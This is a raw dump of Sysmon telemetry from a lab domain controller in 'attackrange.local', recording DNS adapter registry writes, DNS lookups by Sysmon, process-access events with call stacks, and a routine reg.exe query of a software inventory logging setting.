13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000002994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000002993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000002992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x80000000000000002991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000002990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 
13241300x80000000000000002989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000002988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000002987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000002986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000002985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000002984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-495 13241300x80000000000000002983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 22542200x80000000000000002996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:46.489{59A5CD1D-8E56-6005-2E00-00000000A301}2464s2.symcb.com0type: 5 ocsp-ds.ws.symantec.com.edgekey.net;type: 5 e8218.dscb1.akamaiedge.net;::ffff:23.37.43.27;C:\Windows\sysmon64.exe 22542200x80000000000000002997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:46.500{59A5CD1D-8E56-6005-2E00-00000000A301}2464sv.symcd.com0type: 5 ocsp-ds.ws.symantec.com.edgekey.net;type: 5 e8218.dscb1.akamaiedge.net;::ffff:23.37.43.27;C:\Windows\sysmon64.exe 22542200x80000000000000002998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:48.113{59A5CD1D-8E56-6005-2E00-00000000A301}246427.43.37.23.in-addr.arpa.0type: 12 a23-37-43-27.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 10341000x80000000000000003040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E83-6005-8800-00000000A301}43044344C:\Windows\system32\conhost.exe{59A5CD1D-8E83-6005-8A00-00000000A301}4388C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000003039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:59.557{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:59.557{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:59.557{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:59.557{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E83-6005-8A00-00000000A301}4388C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E83-6005-8900-00000000A301}43684372C:\Windows\system32\cmd.exe{59A5CD1D-8E83-6005-8A00-00000000A301}4388C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x80000000000000003028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E83-6005-8A00-00000000A301}4388C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeC:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{59A5CD1D-8E83-6005-8900-00000000A301}4368C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64 10341000x80000000000000003027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.542{59A5CD1D-8E83-6005-8800-00000000A301}43044344C:\Windows\system32\conhost.exe{59A5CD1D-8E83-6005-8900-00000000A301}4368C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:59.542{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.542{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:59.542{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.542{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:59.542{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.542{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:59.542{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 